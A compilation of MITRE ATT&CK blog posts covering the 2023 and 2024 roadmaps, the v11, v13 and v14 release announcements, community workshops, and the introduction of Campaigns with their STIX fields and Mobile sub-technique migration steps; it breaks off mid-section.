We’re always inspired to see how ATT&CK is being used in innovative ways to upgrade defensive capabilities. The regional ATT&CK community workshops — organized by practitioners, for practitioners — provide forums to share insights, use cases, and collaborative approaches for leveraging ATT&CK.

• The European Union (EU) ATT&CK Community workshop, hosted by the Centre for Cybersecurity Belgium and supported by the Center for Threat-Informed Defense (CTID) was the first regional ATT&CK workshop, The 2024 iteration will take place in Brussels, Belgium on May 17, in-person and virtually.
• The Asia-Pacific (APAC) ATT&CK Community Workshop, hosted by the by the CTID, launches this April 25–26 in Singapore, and virtual attendance is still open. The Workshop will advance threat-informed defense through hands-on training, ATT&CK best practices, worst practices, and moonshot approaches.

ATT&CKcon 5.0 | Great Speakers, Content, & Conversations around ATT&CK

ATT&CKcon 5.0 will be arriving in October, featuring both virtual and in-person attendance from McLean, VA. Stay tuned to our Twitter and LinkedIn channels for updates on our Call for Presentations, which will open in the coming months, followed by our illustrious speaker lineup. If your organization is thinking about joining the ATT&CKcon adventure as a sponsor, please reach out to us at [email protected].

Benefactor Program | Empowering Defenders, Sustaining Independence

We want to take a moment to share some insights into the foundational tenants and financial realities of ATT&CK. Much like we crowd-source intelligence and rely on community contributions, ATT&CK itself was built to be independent, responsive, and part of the global community.

From the outset, we deliberately chose not to align ATT&CK with any specific government department or agency. This decision was made to maintain autonomy, flexibility, and to foster collaboration across the broadest spectrum of stakeholders. While this approach has facilitated agility and international partnerships, it also means that ATT&CK lacks a dedicated funding source.

To bridge this funding gap and ensure the continuity of our operations, as well as expanding into new domains, we launched the Benefactor Program last year. This program enables tax-deductible, charitable donations from individuals and organizations who believe in ATT&CK’s mission. These contributions allow us to continue offering free and accessible services while also advancing our capabilities and scope.

We are immensely grateful for the support we have received thus far from initial benefactors SOC Prime, Tidal Cyber, and Zimperium. We remain committed to serving the community with transparency; whether you’re a contributor, a fellow defender, or just getting started, we thank you for being part of ATT&CK’s journey.

Looking Forward

Mark your calendars for the v15 release on April 23! You’ll see some novel content interspersed with familiar elements, as well as more practical defensive measures.

As always, we value the opportunity to collaborate with you in ensuring that ATT&CK remains a living framework, where each contribution, conversation, or new implementation fuels its evolution. We look forward to continuing this adventure with you.

Connect with us on email, Twitter, LinkedIn, or Slack.

©2024 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 24–00779–2.

---

ATT&CK 2024 Roadmap was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

ATT&CK has been brewing up something eerie for this Halloween — a release so hauntingly powerful that it will send a chill down the spine of even the most formidable adversaries. As v14 emerges from the depths, we’re proud to present a more robust and finely-tuned knowledge base. So, grab your flashlights and keep your wits about you as you navigate the latest changes, including enhanced detection guidance for many techniques, a (slightly) expanded scope on Enterprise and Mobile, Assets in ICS, and Mobile Structured Detections.

For the rest of our regular updates/additions across Techniques, Software, Groups and Campaigns take a look at our release notes, our detailed changelog, or our changelog.json.

Detection Upgrade with Analytics

In ATT&CK v13 we started adding “detection notes” and pseudocode analytics from CAR (Cyber Analytics Repository) directly into some detections. In v14 we’ve dramatically expanded the number of techniques with a new easy button and added a new source of analytics. One focus this release was Lateral Movement, which now features over 75 BZAR-based analytics! BZAR (Bro/Zeek ATT&CK-based Analytics and Reporting) is a subset of CAR analytics that enable defenders to detect and analyze network traffic for signs of ATT&CK-based adversary behavior. Moving forward, we plan to continue working across tactics to enhance detection approaches.

Also new: enhanced relationships between detections, data sources, and mitigations. Improving techniques is a collaborative and iterative process, and we work with the community to identify new procedures and enhance data sources and mitigations. This release includes updated technique alignments to data sources and mitigations, better reflecting the most effective defensive measures for the impacted techniques.

Jump into the #defensive_attack channel to be part of the action.

Enterprise’s New(ish) Frontier

Since its inception, ATT&CK has been dynamic, designed to catalog, categorize, and adapt to real-world adversary behaviors that primarily involve direct interaction with devices, systems, and networks. Over the past decade, this adaptability and focus has empowered defenders through consistent, threat-informed resources. As adversaries continually evolve their exploitation of human vulnerabilities, ATT&CK has expanded its scope with this release, encompassing more activities that are adjacent to, yet lead to direct network interactions or impacts. The increased range incorporates deceptive practices and social engineering techniques that may not have a direct technical component, including Financial Theft (T1657: Financial Theft), Impersonation (T1656: Impersonation), and Spearphishing Voice (T1598.004: Phishing for Information: Spearphishing Voice).

Think some behaviors are still missing? Your input remains essential as we continue to expand ATT&CK’s horizons and refine content to match advancing adversary tactics. Email or Slack us what you’re seeing.

Assets Join the ICS Arsenal

We’ve been working on Asset refactoring for a while, and we’re thrilled to introduce the results of our initial efforts. v14 features 14 inaugural Assets, representing the primary functional components of the systems associated with the ICS domain. These Asset pages include in-depth definitions, meticulous mappings to techniques, and a list of related Assets. Our primary goals for Assets are to provide a common language for inter-sector communication, and to empower underrepresented sectors to leverage ATT&CK mappings, fostering meaningful communication about risks and threats. You can also now find Assets on the ATT&CK Navigator.

The Assets refactoring process involved an in-depth review of relevant CTI, researching and refining the resulting definitions based on industry standards, and analyzing how the device features map to ATT&CK Techniques. We look forward to leveraging the deep insights from our industry partners as we continue refining and expanding Assets.

If you’re interested in contributing, head over to the recently created #ics_attack channel.

Reeling in Mobile Threats with Phishing & Structured Detections

With Enterprise increasing its scope a bit, Mobile has also expanded its coverage to include Phishing (Phishing:T1660), which encompasses phishing attempts through vectors including SMS messaging (“smishing”), Quick Response (QR) codes (“quishing”), and phone calls (“vishing”). Mobile Phishing features a new mitigation (M1058: Antivirus/Antimalware), to enhance anti-virus and malware defenses. Also introduced with this release, Mobile structured detections. This allows you to explicitly see the required inputs (Data Sources) for each detection, along with how to analyze the data to identify a specific Technique (detection). Structured detections are part of the ongoing endeavor to bring Mobile to parity with Enterprise.

Next up? Refining existing mitigations and working with the Mobile security community to identify new content. Get involved at #mobile_attack.

Enhancing Your Website Navigation Experience

We’ve refined the navigation bar of the ATT&CK website, streamlining its structure and content to enhance the user experience and overall ease of navigation. Over time, our navigation bar accumulated a lot of ‘stuff’, and we hope this update strikes a balance between necessary links and user needs. The updated navigation bar features a single dynamic menu display, with access to secondary links (most previously featured on the primary bar) in associated dropdown menus:

Love it? Hate it? Let us know.

Looking Forward

We want to extend our deepest gratitude to the heroes of this release — our dedicated contributors. Your relentless commitment to enhancing collective defenses are the true magic behind ATT&CK. As 2023 draws to its end, let’s keep the collaboration alive, because together, we’ll continue to ward off the threats that go bump in the night. Stay vigilant, stay curious, and stay safe — and remember, with ATT&CK, every day is a day to keep adversaries at bay.

As always, connect with us on email, Twitter, or Slack.

©2023 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 22–00745–2.

---

ATT&CK v14 Unleashes Detection Enhancements, ICS Assets, and Mobile Structured Detections was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

ATT&CK v13 Enters the Room: Pseudocode, Swifter Search, and Mobile Data Sources

It’s not like a regular Tuesday, it’s a lucky Tuesday — ATT&CK v13 has arrived. As we outlined in our Roadmap, we’re working toward enhanced tools for lower-resourced defenders, improving ATT&CK’s website usability, enhancing ICS and Mobile parity with Enterprise, and evolving overall content and structure this year. ATT&CK v13 is bringing some analytics pseudocode, Mobile-specific data sources, key website updates, ICS Asset refactoring, and more Cloud and Linux coverage. For the rest of our regular updates/additions across Techniques, Software, Groups and Campaigns take a look at our release notes, our (new) detailed changelog, or our (new) changelog.json.

Defensive Easy Button: Pseudocode for Detection

This release features a new defensive ‘easy button’, with the addition of CAR pseudocode to a number of our data components. These pseudocode analytics add more context on what you should find and collect, by describing at a high level the steps involved in detecting certain types of behaviors. You can use these analytics as a blueprint for your custom detections, leaving you with more time to spend on the defensive activities of your choice.

Moving forward we’ll be revamping Mitigations and improving defenses tactic-by-tactic, by incorporating analytics from CAR and dynamic research into the data components falling under a given tactic. If you’d like to join our efforts, let us know or join us in the #defensive_attack channel.

ATT&CK’s Infrastructure: ATT&CK Search 2.0 and changelog.json

Two of our most frequently requested items are now here: faster search and machine-readable changelogs!

We’ve all experienced the patience-building opportunity associated with using the ATT&CK website search, so we’re thrilled to finally introduce a new and improved search! While it won’t be breaking the sound barrier anytime soon, it will save you some serious time when you’re trying to figure out which techniques cover Import Access Table. Your initial search with the enhanced version will be in the 5-second range, with following queries resolving near instantaneously. We’ll continue to adjust this important feature and appreciate all of you who stayed with us through the search bar trials. Let us know if you spot any new corner cases!

Another significant addition to this release is a machine-readable changelog. You’ll now be able to access and parse through the changelog, quickly identifying and integrating the updates. For more details check out the changelog.json format details in our GitHub. Our release notes format has also been improved, now documenting New, Major Version Changes, Minor Version Changes, and Patches for each of Techniques, Mitigations, Data Sources, Data Components, Software, Groups, and Campaigns. If you’re wondering what “Patches” are, it’s what we’re calling changes so minor (e.g., typos, URL fixes, grammar) no version update was necessary.

We don’t expect quite as much celebration for our ATT&CK Navigator updates, but new updates coming with ATT&CK v13 enable you to further customize your layer colors, scoring, image orientation and preset image sizing — for more details, check out the Navigator release notes (click on the ? in the top right of Navigator).

Mobile: Data Sources are Live

On the Mobile front, you’ll now be able to access Mobile-specific Data Sources! Mobile has joined the filter list along with Enterprise and ICS, enabling you to toggle between the data sources for your chosen domain(s). In addition to the new Mobile-specific sources, the cross-domain mappings with Enterprise are now more accessible. The Mobile-specific and cross-mapped sources are also listed on the individual Data Source pages.

Over the next few months, we’ll continue to add to our Mobile data sources, as well as architecting structured detections. If you’d like to contribute to this space or start a conversation, email or slack us (don’t call).

ICS: Asset Refactoring for Enhanced Coverage

The ICS matrix features new techniques, a freshly cross-mapped campaign, and updates to Assets (the functional components of the systems in the ICS domain). Our Assets refactoring effort seeks to align how different industries describe assets, in order to better map device functionality to core dependencies and associate the Assets to the relevant techniques. Through this effort we’ve also been working to address gaps from underreported industries. We’ll continue to collaborate with the ICS community to better build out and describe assets and create these mappings. Our goal is to include Assets in the metadata box on technique pages to help inform defenders about a device’s susceptibility to techniques.

Campaigns: Criminals, APTs and Cross-Mappings

Our Campaigns game is going strong, with v13 showcasing a blend of recent cyber intrusions and those previously captured in a Group page. A couple of our more contemporary entries include APT41’s compromise of U.S. state government networks (C0017), and an AvosLocker ransomware-as-a-service operation (C0018). Some of the older activity previously featured in Groups, include APT29’s Operation Ghost and the SolarWinds compromise. The star of this release, and one we’re particularly excited about, is the cross-domain Campaign entry, the 2016 Ukraine operation by Sandworm Team. Over the next several months, we’ll continue to focus on criminal group operations and expanding on the hybrid Campaigns that traverse domains.

Cloud: Now with More Exec and LatMo Coverage

We assessed known gaps in the Execution and Lateral Movement tactics of the Cloud matrix and built out additions to address some of the disparities. These changes feature contributions from an ongoing partnership with the Cloud community to better represent behaviors in and against Cloud technologies, as well as reflecting how organizations are using Cloud in their operations. In the coming months, we’ll continue to expand coverage in these not-so-easy-to-capture cloud-related tactics, as well as evaluating where to develop more Exfiltration coverage.

Our end goal this year is to ensure that everyone can more effectively utilize ATT&CK for Cloud. If you have ideas or contributions to share, please email us or drift by the #cloud_attack channel on the ATT&CK slack.

Linux: Making the Penguin a Little More Secure

Our Linux team has spent the last few months going through contributions, coordinating with contributors, and navigating through open-source reporting for in-the-wild adversary behaviors. This release includes updated and new Linux-only (sub)techniques that will enhance the Linux defender’s toolset. We’ll continue building out Linux coverage in ATT&CK, as well as gaining a better understanding of the adversaries operating in this space. If you’d like to work with us or to join our very exclusive Linux channel (#linux_attack), we’d love to have a conversation.

Next Up: v14 and ATT&CKcon

We know you’re still trying to catch your breath from all the v13 adjustments, but we’re still sprinting for v14! October’s release will feature upgraded coverage across domains, renovated mitigations, new cross-domain mappings, more pseudocodes, and Mobile structured detections.

We’ll also be releasing more details on ATT&CKCon 4.0 soon (October 24–25), so start getting ready with some light reading/watching of previous ATT&CKcon presentations or couch interviews.

As always, we look forward to connecting with you on email, Twitter, or Slack.

©2023 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 22–00745–1

---

ATT&CK v13 Enters the Room was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

A Roadmap of 2023’s key efforts: From ICS Assets to more Linux and ATT&CKcon 4.0.

It’s 2023 and we’re all a little older, including ATT&CK, which will be celebrating its 8th (!) release anniversary in a few short months. Last year we matured, expanded, deconflicted, and renovated the knowledge base, persevering through challenges to meet our 2022 goals. Some of our most notable efforts including unveiling Enterprise structured detections, publishing Mobile sub-techniques, introducing ICS detections, transitioning ATT&CK for ICS to the mothership (aka attack.mitre.org), launching Campaigns, and hosting ATT&CKcon 3.0.

The ATT&CK team also trekked around the U.S. and the globe to talk about ATT&CK for defenders, threat hunters, and cyber threat intelligence analysts. We held riveting conversations about purple teaming, discussed best practices for adversary emulation, and connected over common misuses of ATT&CK. You inspired us with your stories, insights and expertise, and we’re thrilled to continue collaborating with you in 2023.

2023 Roadmap

Our focus areas in 2023 will be targeted growth and integration. We’ll be maintaining framework stability as we build out content and structure, while expanding and increasing the scope of some of ATT&CK’s current platforms. We’ll be looking for places where we can add defensive “easy buttons” to ATT&CK and other ways we can improve for lower-resourced defenders. Relatedly, we’ll also be working to enhance the usability, accessibility, and functionality of the ATT&CK website and Navigator. These updates and more will be mainly centered on our April and October releases.

Linux | April & October 2023

We made significant progress in updating the macOS platform last year, and while we’ll continue evolving that content, we’ve officially transitioned the spotlight to Linux for 2023. April’s release will feature Linux contributions (thank you, contributors!) that focus on modifications to parent technique scope, including new sub-techniques and updated procedures.

For the October release, we’re targeting an expanded representation of Linux within ATT&CK. We’re looking to not only better account for activity within on-premise Linux servers, but some of the broader Linux-based (and not always x86) spaces adversaries have been abusing. This will be a substantial effort given how under reported Linux activity is, and the Linux security community’s input is essential for us to improve this platform. We’re working to build out opportunities to connect both online and offline and would like to hear how you’d like to collaborate. In the interim, whether you have specific insights to share, or would just like to talk about ATT&CK for Linux in general, email us and join the #linux_attack channel on the ATT&CK slack.

Defensive Coverage | October 2023

When we added explicit pairing of detections to data sources in ATT&CK v11, it was intended to let you identify the inputs you need to collect (Data Sources), combined with how to analyze that data to identify a given Technique (detection). We’ll be leveling up this year, exploring and including in ATT&CK more specifics on what you as defenders can be collecting related to detections and how. This quest will result in an more directly usable guidance for defenders, as well as a more in-depth look at data collection, analyzation, and identification of a given technique.

We will also be assessing ATT&CK mitigations for gaps and potential improvements this year. We converted mitigations into objects in v5 to increase their usability, and our goal has always been to continue to evolve and improve that knowledge base. Over the next several months, we’ll be researching new preventions and crafting out additional ways to prevent a given technique from succeeding. If you’d like to contribute to either of these quests, let us know or join us in the #defensive_attack channel in our Slack.

ICS | April & October 2023

This will be ICS’s first full year on the ATT&CK site, and we’ll be making additions across the matrix, including more cross-domain mappings (e.g., ICS + Enterprise). We’ll be sharing more details about this and our approach to leveraging ATT&CK for holistic ICS defense in an upcoming blog post.

Over the next several months, we’ll be focusing on addressing overlaps and integration with other domains (primarily between Enterprise and ICS, although Mobile could be included) and revamping ICS Assets. This effort will focus on evaluating Assets in various industries, identifying their interrelations, and determining how they fit into the ATT&CK structure.

If you’d like to share contributions or have other inputs for ICS, connect with us!

Mobile | April & October 2023

We released Mobile sub-techniques last summer, and we’ll continue expanding on those, as well as building out contributions, and collaborating on enhancing multi-domain techniques. Mobile-specific Data Source objects are another goal this year, and they’ll mirror the concept of Data Source objects that Enterprise and ICS currently leverage, informing a more detailed and defined data collection strategy. The Mobile Data Sources will eventually be featured on both the overall Data Sources list as well as the individual Data Source pages. For October, we plan on charting out structured detections, to enable you to enhance your Mobile detections approach.

A core focus for the domain overall is bolstering our collaboration with the mobile security community. Along with the rest of ATT&CK, Mobile’s matrix is mostly crowdsourced, and we rely on the deep expertise from the mobile community to validate our content and help us to mature this knowledge base. If you’d like to contribute to this space or start a conversation, reach out to partner with us.

Campaigns | April & October 2023

We don’t typically highlight all the updates we’ll be making to ATT&CK Techniques, Software, or Groups, but as the newest object on the block, we figured you might be curious about our plans for Campaigns this year. Over the next few months, we’ll be extracting significant Campaigns from several APT groups in ATT&CK and adding them to the knowledge base. Closer to October, we’ll pivot to building out campaigns conducted by criminal groups, including ransomware operations. If you’d like to contribute or just share your thoughts on Campaigns, let’s have a conversation!

Cloud | April & October 2023

Since initially releasing ATT&CK for Cloud in October 2019 (v6), we have continually worked to expand and refine how these platforms fit within the broader ATT&CK for Enterprise. Cloud introduces many new challenges for defenders, as well as potential opportunities to rethink how we describe adversary behaviors. For example, how does our understanding of tactics such as Execution, Lateral Movement, and Exfiltration change when considering cloud environments?

Throughout 2023 we will work to adapt these definitions with the goal of helping everyone (cloud expert or not) better understand and utilize ATT&CK for Cloud. As always, if you have specific insights or relevant ideas to share, please email us and join the #cloud_attack channel on the ATT&CK slack.

ATT&CKcon 4.0 | October 24–25, 2023

Whether you’re a sophisticated ATT&CKer, a hobbyist, or you’re just getting started, we’d love to connect with you at ATT&CKcon 4.0! We’ll be hosting 4.0 in-person and virtually from McLean, VA October 24–25 this year. Watch our Twitter and LinkedIn for announcements on our CFP when it opens in the next few months, followed by our lineup of speakers in late summer. If your organization is interested in sponsoring ATT&CKcon, drop us a line at [email protected].

Here’s to (all) of You

We received an exceptional number of contributions across domains and platforms last year and are incredibly grateful for the support. ATT&CK will always be community-driven and we’d like to thank each and every one of you that took the time to submit contributions, share research and new use cases, and join us in innumerable ATT&CK discussions.

We’re looking forward to another great year of collaboration and can’t wait to connect with you in-person or via email, Twitter, or Slack!

©2023 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 22–00744–16.

---

2023 ATT&CK Roadmap was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

Introducing Campaigns to MITRE ATT&CK

By: Amy Robertson, Jared Ondricek, and Matt Malone

We’ve talked about building Campaigns into ATT&CK in our ATT&CK 2022 roadmap, at ATT&CKCon 3.0, and most recently on the SANS Threat Analysis Rundown but their release is now nigh! Our initial collection of Campaigns will be available starting with our ATT&CK v12 release on October 25, when you’ll be able to leverage the Campaigns structure for all of your ATT&CK use cases. Prior to the release, we’re taking the opportunity to walk you through our vision for Campaigns, give you a tour of Campaigns elements, and cover our longer-term Campaigns plans.

The Campaigns Vision

For our purposes in ATT&CK, we use “Campaigns” to describe a grouping of intrusion activity conducted over a specific period of time with common targets and objectives. A key aspect of Campaigns is that the activity may or may not be linked to a specific threat actor.

Our vision for Campaigns is to provide users with another way to view the evolution of malicious cyber operations. Threat actor activity in ATT&CK currently encompasses a broad set of behaviors that can inform a holistic picture of the adversary over time. But as adversaries evolve, their TTPs often change, and by introducing some structure with Campaigns, we hope to allow you to glean more actionable intelligence and context to inform your defense prioritization. Campaigns will enable you to identify trends, track significant changes in techniques used by various actors, and monitor the introduction of new capabilities (or exploited vulnerabilities). You’ll also be able to identify continued threat actor reliance on certain techniques regardless of the campaign objective and/or targets.

Campaigns will also allow us to more accurately categorize complex intrusion activity, including those involving multiple threats (such as Ransomware-as-a-Service operations) and parse out overlapping operations that have been given the same name. With the new structure, we’ll also be converting some of the Groups in ATT&CK to Campaigns. This will apply to Groups that meet our definition of a Campaign and only feature one cluster of activity (such as G0101/Frankenstein and G0014/Night Dragon).

As is our tradition of carefully integrating structural elements in ATT&CK, we’ll be incorporating a limited number of Campaigns into the v12 release. This initial collection of Campaigns will feature former Group entries that are more accurately categorized as Campaigns, a curated number of Campaigns linked to existing Groups, as well as unattributed Campaigns.

Campaign Elements

We structured Campaigns to visually align with Groups and Software pages, and the v12 release will feature an addition of a new “Campaigns” button on the main page tool bar for easy access.

The Campaigns homepage will include a Campaigns table featuring ID number, Name, and activity descriptions. The list of available Campaigns in the left column highlights the Campaigns added or converted to date. As we previously covered, we created some flexibility in terms of whether or not the activity was given a unique name — a limitation we currently face with Groups — by allowing a Campaign to be simply referenced by our own identifier (e.g., C0014) if it doesn’t already come with a name.

Each Campaign entry will feature a description of the intrusion activity, including details like known targeted countries and sectors where available, as well as any information that makes this Campaign particularly noteworthy.

Something we’ve been particularly mindful of is how to best capture the period of time related to a Campaign. We opted for the “First Seen” and “Last Seen” fields in the information box, with the corresponding reference citations, so users can see how a Campaign was scoped. For intrusion activity assessed to be ongoing at the time of report publication, we’ll add language to that affect in the Campaign description (e.g., “As of September 2022 security researchers assessed this activity was ongoing”) and update future versions of ATT&CK Campaign entries accordingly.

As with Groups and Software, we’ve created a “Techniques Used” table to capture actor procedure examples observed during a Campaign, with a couple of significant differences.

1. We’ll add as much detail as reporting allows regarding specific commands or steps taken by the actors, to help ATT&CK users identify corresponding detection and mitigation opportunities. We’ve found this concept to be more challenging for Group and Software pages, as those tend to aggregate a variety of reporting examples over time, resulting in more generic procedure example language.

2. We’ll preface our Campaign procedure examples with the Campaign name or associated ID number, to separate it from techniques already found on a Group page. We realize the utility of this may not be immediately evident while looking at a Campaign page, but this allows for the procedure examples to stand out separately when a Campaign is associated with a Group (and, hopefully, allows for smoother integration in the future if an unattributed Campaign is later attributed to a Group).

What does this mean for Groups and Software?

We’ve made two key changes to Group and Software pages as they relate to Campaigns. As previously mentioned, techniques and corresponding procedure examples mapped to a Group-attributed Campaign will carry over to the associated Group page. We’ll also continue to map Campaign-specific procedure examples to Software pages.

We’ve added a Campaigns table to associated Group and Software pages, so ATT&CK users can easily reference Campaign ID numbers, Names (when applicable), and the Campaign description.

Group and Software pages will otherwise remain visually unchanged, and we’ll continue to update them separately as a collective list of all observed techniques. We want to preserve the functionality of ATT&CK Navigator Layers in that respect, for ATT&CK users who want to focus on all techniques used regardless of time or target.

Introducing the Campaign STIX Object

With the addition of Campaigns to ATT&CK, the ATT&CK Data Model (which can be found in our Usage document), has expanded to encompass these changes. The diagram below portrays how all the moving pieces work together, with the new additions of the Campaign object type and the Relationships connected to Campaigns. It’s important to note, there are no changes to objects that previously existed in ATT&CK. Software written to read earlier versions of ATT&CK should continue to work, albeit missing data that only appears in Campaigns.

Now that you’ve seen our data model, we’d like to introduce you to the star of the show — the STIX Campaign object. As a part of the ATT&CK Data Model, it makes use of the same STIX extensions that can be found there, such as x_mitre_version. However, in addition to those previously documented fields, here is the breakdown of how ATT&CK utilizes each field that is unique to the Campaign object:

Standard STIX fields:

• type: Follows the STIX specification
• name: The name used to identify the Campaign. If no name is given, then this field will contain an ATT&CK identifier in the form CXXXX
• description: Follows the STIX specification
• aliases: Used to hold associated Campaign names
• first_seen (timestamp): The time frame that this Campaign was first seen. ATT&CK makes use of this field only to the level of granularity of month/year. The day and time part of this timestamp field should be ignored by parsers when displaying ATT&CK Campaign information
• last_seen (timestamp): The time that this Campaign was last seen or reported. ATT&CK makes use of this field only to the level of granularity of month/year. The day and time part of this timestamp field should be ignored by parsers when displaying ATT&CK Campaign information
• objective: Not used by ATT&CK

Extensions of the STIX Spec:

• x_mitre_first_seen_citation (string): One to many citations for when the Campaign was first reported in the form “(Citation: <citation name>)” where <citation name> can be found as one of the source_name of one of the external_references.
• x_mitre_last_seen_citation (string): One to many citations for when the Campaign was last reported in the form “(Citation: <citation name>)” where <citation name> can be found as one of the source_name of one of the external_references.

As mentioned above, we have also added three new STIX Relationships that connect Campaigns to the rest of the ecosystem; namely that Campaigns can optionally be attributed to a Group, use Software, or use Techniques. The STIX Relationship objects themselves have no special modifications from the STIX standard and simply connect Campaigns to those previously existing objects. At a glance this seems straightforward enough, but there are some things to be aware of if you are parsing ATT&CK v12 STIX going forward.

When gathering data about Groups that have Campaigns attributed to them, it’s a bit more complex to parse out all the Techniques and Software that are used by the Group. For Campaigns associated with a Group, we won’t be creating relationships between techniques and Software in that Campaign and the Group, if you would like to view the inclusive list, you’ll need to combine technique sets and Software usage.

Combining Technique Sets: To get a comprehensive Group Technique view, you’ll need to combine the set of Techniques that are directly used by the Group with the set of Techniques used by all of their associated Campaigns.

Mapping Software Object Usage: To holistically map out Software object usage, you’ll identify the Groups, the Group-attributed Campaigns, and the unattributed Campaigns using the Software, and combine them for the full picture.

For further technical details on how to handle retrieving all Techniques or Software that a Group uses starting with the v12 release and how it differs from the v11 and prior releases, please refer to the Relationships Microlibrary section of the GitHub Usage document.

What to Expect Going Forward

We’ll continue modifying and building out Campaigns, with the eventual goal of revisiting a major Group pages in ATT&CK and reconstructing earlier Campaigns to reflect how these actors have evolved over time. We’ll also shift focus from one-off or unattributed Campaigns to more complex Campaigns attributed to some of the more populated Group entries, such as the SolarWinds intrusion and G0016/APT29.

Campaigns will also serve a key role in tying together the various ATT&CK matrices — Enterprise (Cloud, Containers, macOS, and Linux), Mobile, and ICS, to further document how adversaries pivot across these domains using a variety of techniques to accomplish their objectives.

We greatly appreciate the community’s feedback on Campaigns to date, and as we continue to develop Campaigns, we welcome your input. Our Contributions page will be updated in the near future to include more detailed guidance and we look forward to connecting with you via email, Slack, or Twitter.

©2022 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 22–00744–13.

---

Introducing ATT&CK Campaigns was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

ATT&CK Goes to v11: Structured Detections, Beta Sub-Techniques for Mobile, and ICS Joins the Band

By Adam Pennington and Jason Ajmo

Right on cue, ATT&CK’s latest release is out, and this time we’ve gone to v11! If you’ve been following along with our roadmap there shouldn’t be any huge surprises in store, but we wanted to take a chance to go over our latest changes. The v11 set list includes detections now paired with related Data Sources: Data Components, a beta version of sub-techniques for ATT&CK for Mobile, ATT&CK for ICS on attack.mitre.org, as well as regular updates/additions across Techniques, Software, and Groups.

ATT&CK for Enterprise Structured Detections

Over the past few years, transforming various actionable ATT&CK fields into managed objects has been a reoccurring theme. In v5 of ATT&CK, we converted mitigations into objects to enhance their value and usability — with this conversion, you can now identify a mitigation and pivot to various techniques it can potentially prevent. This has been a feature that many of you have leveraged to map ATT&CK to different control/risk frameworks. We previously converted data sources to objects for the v10 release, enabling similar pivoting and analysis opportunities.

In today’s v11 release we’ve taken a parallel approach for detections in Enterprise ATT&CK, taking the previously free text detections featured in Techniques, and have refined and merged them into descriptions that are connected to Data Sources. We have typically tried to match the detection text on a Technique to its Data Sources, but this makes the paring explicit. This will let you now see for each detection what you need to collect as inputs (Data Sources) paired with how you could analyze that data to identify a given Technique (detection). Below is an example of how Data Sources and Detections have changed for Steal or Forge Kerberos Tickets (T1558).

Detections will also now be included on Data Source pages, associated with each Technique listed for a Data Component.

As with everything else in ATT&CK, these new detections also appear in our STIX as a part of the “detects” relationship added in our last ATT&CK release in its “description” field. For more information about ATT&CK’s STIX representation, including the data source objects and relationships added in ATT&CK v10, you can check out our STIX usage document.

Mobile Sub-Techniques Beta

In 2020, we added Sub-Techniques to ATT&CK for Enterprise. In the time since, they’ve been well-received and solved some of the growth issues we were having in our biggest matrix. As ATT&CK’s Mobile Lead Jason Ajmo recently talked about in the ATT&CK Blog, we’re now bringing this improvement to ATT&CK for Mobile as a beta release. The content on the main ATT&CK site now contains the Sub-Techniques beta, and the current, stable Mobile content can be accessed at https://attack.mitre.org/versions/v10/matrices/mobile/. We plan on making ATT&CK for Mobile with Sub-Techniques final this summer, after we’ve given the community time to check out the content, get ready for it, and send us any feedback they have to [email protected]. Until that time, the main STIX representation of ATT&CK for Mobile will remain the v10 pre-Sub-Techniques version.

How can I move to the beta ATT&CK for Mobile with sub-techniques?

First, you’ll need to support some changes to Mobile ATT&CK’s technique structure necessary to support sub-techniques. If you’re already using or have moved to versions of ATT&CK for Enterprise with sub-techniques, the structural changes and the process of moving are identical. As with ATT&CK for Enterprise, we’ve expanded Mobile technique IDs to identify corresponding sub-techniques: T[technique].[sub-technique]. In Mobile’s STIX representation of ATT&CK we’ve added the “x_mitre_is_subtechnique = true” to “attack-pattern” objects that represent a sub-technique, and “subtechnique-of” relationships between techniques and sub-techniques. Both are already contained in our STIX documentation. You can find a STIX representation of ATT&CK that includes the v11 Mobile Beta here.

Next, if you want to get a head start and remap your content from a previous version of Mobile ATT&CK, to this beta release. As we did when we released Sub-Techniques for ATT&CK for Enterprise, we’re providing a translation table or “crosswalk” from previous release Mobile technique IDs to beta ones to help with the transition. The JSON file shows what happened to each technique in the beta release. The top-level technique ID represents each technique from the v10 release, and the structure underneath shows what changed with the v11 beta release, if anything.

Thanks to the excellent feedback from the community, we identified four key types of changes:

1. Remains Technique
2. Became a Sub-Technique
3. One or More Techniques Became New Technique
4. Deprecated

Each of these types of changes is represented in the “change-type” field in the JSON. Some of these changes are simpler to implement than others. We recognize this, and in the following steps, we incorporate the four types of changes into tips on how to move from our previous release to ATT&CK with sub-techniques.

Step 1: Start with the easy to remap techniques first and automate

For “Remains Technique”, “Became a Sub-Technique”, or “One or More Techniques Became New Technique” change types you can replace the previous technique ID with the new technique ID.

In some cases, technique names have changed, or tactics have been removed, so it’s also worth checking the “explanation” in the JSON.

Remains Technique

The first thing that’s easy to remap — the techniques that aren’t changing and don’t need to be remapped. Anything labeled “Remains Technique” is still a technique with an unchanged technique ID like T1398 in the above example.

Became a Sub-Technique

Next in the “easy to remap category” are the technique to sub-technique transitions, labeled “Became a Sub-Technique”. These techniques were converted into the sub-technique of another technique. In this example, Modify System Partition (T1400) became Hijack Execution Flow: System Runtime API Hijacking (T1625.001).

Finally, there are a few techniques that merged with other techniques.

One or More Techniques Became New Technique

For techniques labeled “One or More Techniques Became New Technique” a new technique was created covering the scope and content of one or more previous techniques. For example, Network Traffic Capture or Redirection (T1410) and a few other techniques merged together to create Adversary-in-the-Middle (T1638).

For any of these “easy” types of changes anything represented by the previous ATT&CK technique ID should be transitioned to the new technique or sub-technique ID. The ATT&CK STIX objects represent this type of change as a revoked object which leaves behind a pointer to what they were revoked by. In the case of T1400, that means it was revoked by T1625.001.

In all of these cases, it’s enough to take what’s listed as the top-level key and replace it with what’s listed in the nested “id” key.

Step 2: Look at the deprecated techniques to see what changed

This is where some manual effort will take place. Deprecated techniques are not as straightforward.

Deprecated

